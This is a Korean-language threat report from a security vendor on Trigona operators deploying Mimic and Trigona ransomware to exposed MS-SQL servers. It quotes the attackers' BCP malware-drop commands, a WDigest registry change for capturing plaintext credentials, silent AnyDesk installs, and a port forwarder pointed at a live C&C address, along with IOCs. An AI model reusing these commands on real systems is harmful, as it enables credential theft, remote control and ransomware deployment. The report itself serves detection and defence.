AhnLab SEcurity intelligence Center(ASEC)은 최근 Trigona 랜섬웨어 공격자가 Mimic 랜섬웨어를 설치하는 새로운 활동을 확인하였다. 이번에 확인된 공격 사례는 기존 사례들과 유사하게 MS-SQL 서버를 대상으로 하며 악성코드 설치 과정에서 MS-SQL 서버의 BCP(Bulk Copy Program) 유틸리티 악용했다는 점이 특징이다.
- Trigona 랜섬웨어 : 적어도 2022년 6월부터 활동한 것으로 알려졌으며 [1] 주로 MS-SQL 서버를 공격 대상으로 최근까지도 활동이 지속되고 있다.
- Mimic 랜섬웨어 : 2022년 6월에 최초로 발견되었으며 [2] 2024년 1월에는 터키어를 사용하는 공격자가 부적절하게 관리되는 MS-SQL 서버를 공격해 Mimic 랜섬웨어를 공격한 사례가 공개되었다. [3]
ASEC에서는 2024년 1월 초 BCP를 활용해 Mimic 랜섬웨어를 설치하는 공격 사례를 최초로 확인하였으며, 2024년 1월 중순에는 동일한 방식의 공격 사례들에서 Mimic 랜섬웨어 대신 Trigona 랜섬웨어가 설치된 것을 확인하였다. Mimic 랜섬웨어의 랜섬노트에서 사용한 공격자의 이메일 주소는 다른 공격 사례들에서 확인되지 않았지만 이후 확인된 Trigona 랜섬웨어의 랜섬노트에서는 2023년 초부터 Trigona 랜섬웨어 공격자가 사용하고 있는 이메일 주소가 사용되었다. [4]
이에 따라 2024년 1월 중순에 확인된 공격 사례는 기존 Trigona 공격자의 소행으로 여겨지며 2024년 1월 초에 확인된 Mimic 랜섬웨어 공격 사례도 동일한 공격자로 보고 있다. 이는 두 개의 사례 모두 부적절하게 관리되는 MS-SQL 서버를 대상으로 하였다는 점과 악성코드 설치에 BCP를 사용하였다는 점 그리고 공격에 사용된 다양한 문자열, 경로명이 동일한 점을 근거로 한다. 이외에도 각각의 공격 사례들에서 동일한 악성코드가 사용된 점도 있다.
1. Trigona 랜섬웨어
Trigona 랜섬웨어는 델파이 언어로 개발되었으며 파일들을 암호화할 때 RSA 및 AES 암호화 알고리즘을 이용한다. 2023년 2월 Arete 사의 보고서에서 ManageEngine 취약점(CVE-2021-40539)을 공격한 사례가 확인되었으며, [5] 2023년 4월에는 자사 ASEC 블로그에서 부적절하게 관리되는 MS-SQL 서버를 대상으로 한 공격 사례를 공개한 바 있다. [6]
이번 공격 사례도 2023년과 동일하게 MS-SQL 서버를 대상으로 하며 랜섬노트에 저장된 공격자의 이메일 주소를 통해 이번에 확인된 Trigona 랜섬웨어도 이전 사례들과 동일한 공격자임을 알 수 있다.
- Email : farusbig@tutanota[.]com
- URL : hxxp://znuzuy4hkjacew5y2q7mo63hufhzzjtsr2bkjetxqjibk4ctfl7jghyd[.]onion/
2. Mimic 랜섬웨어
Mimic 랜섬웨어는 암호화할 대상이 되는 파일들을 찾는 과정에서 Everything이라고 하는 파일 검색 프로그램을 악용하는 것이 특징인 랜섬웨어이다. 공격자는 시스템에 존재하는 파일들을 암호화하는 작업을 더 빠르게 하기 위해 Everything 도구를 악용하는 것으로 추정된다. 이외에도 개발 과정에서 소스 코드가 공개된 Conti 랜섬웨어의 기능들을 차용하기도 했다. [7]
2023년 1월에 공개된 TrendMicro 보고서와 2024년 1월에 공개된 Securonix 보고서에서 각각 확인된 Mimic 랜섬웨어들과 이번 공격에서 사용된 것은 거의 외형적으로는 거의 동일한 형태이다. 악성코드는 7z SFX 실행 압축 파일로 제작되었으며 내부에 “Everything64.dll”이라는 이름의 압축 파일에 실제 악성코드들과 Everything 도구들이 암호 압축되어 있다. 악성코드가 실행되면 내부에 포함된 7z 및 “Everything64.dll” 압축 파일을 압축 해제하고 다음과 같이 비밀번호를 이용해 압축을 해제한다.
| > 7za.exe x -y -p58042791667523172 Everything64.dll > 7za.exe x -y -p624417568130113444 Everything64.dll |
최종적으로 설치된 폴더에는 Mimic 랜섬웨어와 Everything 도구들 외에도 윈도우 디펜더를 비활성화하기 위한 목적의 Defender Control 도구(DC.exe) 그리고 Sysinternals의 SDelete 도구(xdel.exe)가 함께 포함되어 있다.
랜섬노트에 적힌 공격자의 이메일 주소는 2023년 1월에 공개된 TrendMicro 보고서와 2024년 1월에 공개된 Securonix 보고서의 Mimic 랜섬웨어들이 사용한 것과 다르며 다른 공격 사례들에서도 확인되지 않는다. 대신 뒤에서 다룰 여러 가지 정황들을 통해 Trigona 랜섬웨어 공격자가 Mimic 랜섬웨어를 공격에 함께 사용하고 있는 것으로 추정하고 있다.
- Email : getmydata@list.ru
3. BCP를 이용한 악성코드 설치
공격 대상은 부적절하게 관리되고 있는 MS-SQL 서버 즉 외부에 노출되어 있으면서 계정 정보를 단순하게 설정하여 무차별 대입 공격이나 사전 공격에 취약한 시스템들로 추정된다. 이는 Trigona 랜섬웨어 공격자가 과거부터 이러한 시스템들을 공격 대상으로 한다는 점 외에도 LoveMiner, Remcos RAT 등의 악성코드들이 해당 공격 과정 전과 후에 설치된 감염 로그들이 존재하는 것을 통해 추정할 수 있다.
3.1. BCP를 이용한 파일 생성
BCP(Bulk Copy Program) 유틸리티인 bcp.exe는 MS-SQL 서버에서 대량의 외부 데이터를 가져오거나 내보내는데 사용되는 커맨드 라인 도구이다. 일반적으로 SQL 서버의 테이블에 저장된 대량의 데이터를 로컬의 파일로 저장하거나 로컬에 저장된 데이터 파일을 SQL 서버의 테이블에 내보내는데 사용된다.
일반적으로 MS-SQL 서버를 공격하는 공격자는 악성코드 다운로드 시 파워쉘 명령을 이용하며 최근에는 SQL 서버에 포함되어 있는 파워쉘 도구인 SQLPS를 악용하기도 한다. [8] 하지만 이번 공격 사례에서 공격자는 데이터베이스에 악성코드를 저장한 이후 BCP를 이용해 로컬에 파일로 생성하는 방식을 사용한 것으로 추정된다.
공격자는 Trigona 랜섬웨어 바이너리가 저장된 테이블 “uGnzBdZbsi”에서 다음과 같은 명령을 이용해 로컬 경로로 Trigona 랜섬웨어를 내보낸 것으로 추정된다. 참고로 “FODsOZKgAU.txt”는 포맷 파일로서 포맷 정보가 포함되어 있을 것으로 보인다.
다음은 공격에 사용된 다양한 악성코드 및 도구들을 내보내는데 사용된 BCP 명령들이다.
- Anydesk
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\AD.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt” - Port Forwarder 악성코드
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\4.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt” - Launcher 악성코드
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\pp2.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\pp2.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt” - Mimic 랜섬웨어
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\K2K.txt” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\K3K.txt” -T -f “C:\users\%ASD%\FODsOZKgAU.txt” - Trigona 랜섬웨어
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\build.txt” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt” - 기타
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kkk.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kur.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\kkk.bat” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
3.2. 정보 조회
참고로 BCP를 이용해 악성코드를 생성하기 전 즉 공격에 성공한 이후 공격자가 가장 먼저 실행하는 명령은 다음과 같이 감염 시스템의 정보를 조회하는 명령들이다. 공격자는 해당 명령들을 통해 얻은 정보들을 바탕으로 환경에 맞는 악성코드들을 설치하였을 것으로 보인다.
| > hostname > whoami > wmic computersystem get domain > wmic computersystem get totalphysicalmemory |
3.3. 자격 증명 정보 탈취
Trigona 랜섬웨어 공격자는 자격 증명 정보를 탈취하기 위해 미미카츠를 사용하는 것으로 알려져 있다. [9] [10] 비록 공격 과정에서 미미카츠의 로그는 확인되지 않았지만 공격자는 WDigest 보안 패키지를 이용한 평문 비밀번호를 획득하기 위해 UseLogonCredential 레지스트리 키를 설정하는 명령을 실행하기도 하였다.
| > REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest” /v UseLogonCredential /t REG_DWORD /d 0x00000001 |
3.4. AnyDesk
이외에도 감염 시스템을 제어하기 위해 Anydesk를 설치하였다. AnyDesk는 원격 관리 도구로써 원격 데스크톱, 파일 전송 등 다양한 기능들을 제공한다. 원격 데스크톱이라고 한다면 RDP와 같이 AnyDesk가 설치된 환경에 원격으로 접속하여 GUI 환경에서 제어를 지원하는 기능이다.
Anydesk는 기존 Trigona 랜섬웨어 공격자뿐만 아니라 대부분의 공격 그룹들이 악용하는 대표적인 원격 관리 도구이다. 원격 관리 도구는 재택근무나 원격 제어 및 관리를 위한 정상적인 목적으로 사용하는 사례가 많으며 이에 따라 AntiVirus 제품에서는 일반적인 악성코드들과 달리 이러한 도구들을 단순하게 탐지하고 차단하는 데 한계가 존재한다. 공격자들은 이러한 점을 악용하여 최초 침투 과정이나 측면 이동 과정에서 공격 대상 시스템을 제어하기 위해 RAT 악성코드 대신 원격 제어 도구들을 설치하기도 한다.
| > %SystemDrive%\users\%ASD%\music\AD.exe –install C:\”Program Files (x86)”\ –silent > %SystemDrive%\”Program Files (x86)”\AnyDesk-ad_1514b2f9.exe –get-id” |
4. 공격에 사용된 악성코드 분석
이번에 확인된 공격 사례에서는 BCP를 악용했다는 점 외에도 안전 모드를 활용한 정황이 확인되었다는 것도 특징이다. Mimic 랜섬웨어와 Trigona 랜섬웨어 공격에서는 공격자가 제작한 것으로 보이는 두 개의 악성코드가 추가적으로 확인된다.
하나는 자신을 안전 모드에서도 동작 가능한 서비스로 등록하고 이후 서비스로 동작할 시 인자로 전달받았던 프로그램을 실행시키는 기능을 담당하는 Launcher 악성코드이다. 다른 하나는 동일하게 안전 모드에서도 동작 가능한 서비스로 등록한 이후 RDP를 활성화하고 인자로 전달받은 주소에 RDP 포트에 대한 포워딩을 지원하는 Port Forwarder 악성코드이다.
PDB 정보에 따르면 공격자는 Launcher 악성코드를 “app2”로, 포트 포워더 악성코드를 “client”로 이름 지었다.
비록 시스템의 부팅 방식을 안전 모드로 설정하는 악성코드나 명령 로그는 확인되지 않았지만 다음과 같이 MS-SQL 서버 프로세스가 시스템을 재부팅하는 명령을 실행한 로그는 확인된다. Launcher 악성코드가 인자로 전달받은 악성코드를 실행한 이후 안전 모드 부팅 옵션을 비활성화하는 것을 보면 정황상 공격자는 악성코드 설치 이후 시스템을 안전 모드로 재부팅하여 랜섬웨어를 동작시킨 것으로 추정된다.
| > shutdown -r -f -t 5 |
4.1. Launcher 악성코드
공격자는 다음과 같은 인자를 전달하여 Launcher 악성코드를 실행시켰다. Launcher 악성코드는 실행 시 “C:\windows\temp\LeVfeNXHoa” 경로에 자신을 복사한다. 이후 전달받은 인자에 따라 다음 작업을 진행하는데 먼저 첫 번째 인자로 서비스의 이름을 그리고 두 번째 인자로 복사할 파일의 경로를 전달받는다. 두 번째 인자에서 전달받은 경로의 파일은 세 번째 인자로 전달받은 경로로 옮긴다. 참고로 두 번째 인자로 전달받은 파일은 Mimic 랜섬웨어였다.
| > %ALLUSERSPROFILE%\pp2.exe 1111111 c:\programdata\K2K.txt c:\programdata\2K.EXE” |
Launcher 악성코드는 첫 번째 인자로 전달받은 이름인 “1111111”로 자신을 서비스에 등록한 후 안전 모드에서도 동작할 수 있도록 추가적인 작업을 진행한다. 이후 서비스로 동작하면 세 번째 인자로 전달받은 경로의 랜섬웨어를 실행하며 여기까지의 과정이 끝나면 안전 모드 설정을 비활성화하여 다시 정상적으로 부팅될 수 있도록 한다.
4.2. Port forwarder
공격자는 다음과 같은 인자를 전달하여 Port forwarder 악성코드를 실행시켰다. 포트 포워딩이랑 특정 포트에서 전달받은 데이터를 다른 포트로 전달하는 기능이다. 해당 악성코드는 RDP 서비스 즉 3389번 포트에 대한 포트 포워딩을 지원한다. 일반적으로 RDP 관련 포트 포워딩 도구들은 외부에서 공격자가 NAT 환경에 직접 접근할 수 없는 점을 극복하기 위해 사용된다.
Port forwarder는 리버스 커넥션 방식으로 공격자의 주소에 먼저 연결한 이후 감염 시스템의 RDP 포트에 연결하여 두 개의 통신을 중개해 준다. 이에 따라 공격자는 NAT 환경에서 동작 중인 시스템이더라도 RDP 연결이 가능해져 원격에서 감염 시스템을 제어할 수 있게 된다. 이렇게 RDP를 활용하기 때문에 악성코드는 다음 명령들을 실행해 추가적으로 RDP 서비스를 활성화하기도 한다.
Port forwarder는 설치 모드로 실행 시 자신을 “C:\windows\temp\WindowsHostServicess.exe” 경로에 복사하고 “WindowsHostServicess” 이름으로 서비스에 등록한다. 서비스는 위 Launcher 악성코드와 유사하게 안전 모드에서도 동작할 수 있도록 설정한다.
| > %SystemDrive%\users\%ASD%\music\4.exe –ip “2.57.149[.]233” –port “3366” –install |
Port forwarder는 5개의 인자를 갖는데 3개는 모드로서 각각 설치, 삭제 그리고 실행 기능을 지원한다. 실행 모드에서는 위의 서비스 설치 과정 없이 인자로 전달받은 C&C 서버에 접속하여 포트 포워딩을 지원한다.
| 인자 | 설명 |
|---|---|
| –install | 설치 모드 |
| –uninstall | 삭제 모드 |
| –run | 실행 모드 |
| –ip | C&C 서버의 IP 주소 |
| –port | C&C 서버의 Port 번호 |
C&C 서버에 접속하기 전에는 “C:\windows\temp\elZDk6geQ8” 경로에 운영체제 정보나 사용자 및 컴퓨터 이름 등의 시스템의 기본적인 정보들을 저장하며 최초 접속 시 해당 정보들을 전달한다.
이후 C&C 서버로부터 전달받은 명령에 따라 포트 포워딩 또는 자가 삭제 명령을 수행할 수 있다.
| 명령 | 기능 |
|---|---|
| 0x8CC03FAF | C&C 서버와 RDP 서비스에 대한 포트 포워딩 시작 |
| 0x0002C684 | 자가 삭제 |
5. 결론
최근 Trigona 랜섬웨어 공격자가 부적절하게 관리되고 있는 MS-SQL 서버를 대상으로 Mimic 랜섬웨어 및 Trigona 랜섬웨어를 설치하고 있다. 공격자는 포트 포워딩 기능을 담당하는 악성코드를 이용해 감염 시스템에 RDP로 접속하여 원격 제어를 하려는 시도도 확인된다.
Trigona와 같은 랜섬웨어 공격자들은 수익을 위해 감염 시스템을 암호화하고 민감한 정보를 탈취하여 협박하는 방식을 사용하고 있다. 이외에도 자격 증명 정보 탈취 및 측면 이동을 위한 다양한 기법들을 시도하기 때문에 기업에서는 단일한 시스템뿐만 아니라 기업 내부망 전체가 장악되어 기업의 민감한 정보들이 탈취당하고 네트워크 내의 시스템들이 암호화될 수 있다.
MS-SQL 서버를 대상으로 하는 공격에는 대표적으로 부적절하게 계정 정보를 관리하고 있는 시스템들에 대한 무차별 대입 공격(Brute Forcing)과 사전 공격(Dictionary Attack)이 있다. 관리자들은 계정의 비밀번호를 추측하기 어려운 형태로 사용하고 주기적으로 변경하여 무차별 대입 공격과 사전 공격으로부터 데이터베이스 서버를 보호해야 한다.
그리고 V3를 최신 버전으로 업데이트하여 악성코드의 감염을 사전에 차단할 수 있도록 신경 써야 한다. 또한 외부에 공개되어 접근 가능한 데이터베이스 서버에 대해 방화벽과 같은 보안 제품을 이용해 외부 공격자로부터의 접근을 통제해야 한다. 위와 같은 조치가 선행되지 않을 경우 공격자 및 악성코드들에 의해 계속적인 감염이 이루어질 수 있다.
파일 진단
– Trojan/Win.Generic.R531737 (2022.10.27.00)
– HackTool/Win.DefenderControl.C5481630 (2023.09.06.00)
– Ransomware/Win.Mimic.C5543473 (2023.11.18.01)
– Ransomware/Win.Filecoder.C5561780 (2023.12.12.01)
– Trojan/Win.Agent.C5574264 (2024.01.14.03)
– Trojan/Win.Agent.C5574265 (2024.01.14.03)
행위 진단
– Malware/MDP.Minipulate.M71
– Persistence/MDP.AutoRun.M203
– DefenseEvasion/MDP.ModifyRegistry.M1234
– Ransom/MDP.Decoy.M1171
– CredentialAccess/MDP.Mimikatz.M4367
IOC
MD5
– a24bac9071fb6e07e13c52f65a093fce : Launcher (pp2.exe)
– a6e2722cff3abb214dc1437647964c57 : Launcher (pp2.exe)
– 3e26e778a4d28003686596f988942646 : Port Forwarder (4.exe)
– d6b4b1b6b0ec1799f57142798c5daf5b : Mimic Ransomware Dropper (K2K.exe)
– 6d44f8f3c1608e5958b40f9c6d7b6718 : Mimic Ransomware Dropper (K3K.exe)
– b3c8d81d6f8d19e5c07e1ca7932ed5bf : Mimic Ransomware (K2K.exe)
– a02157550bc9b491fd03cad394ccdfe7 : Mimic Ransomware (3usdaa.exe)
– c28b33f7365f9dc72cc291d13458f334 : Trigona Ransomware (build.txt)
– ac34ba84a5054cd701efad5dd14645c9 : Defender Control (DC.exe)
C&C
– 2.57.149[.]233:3366
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보
[…] 사용되고 있으며 과거 Lockis 랜섬웨어나 [1] Mimic 랜섬웨어 공격 사례 [2] 등 ASEC 블로그에서도 다룬바 […]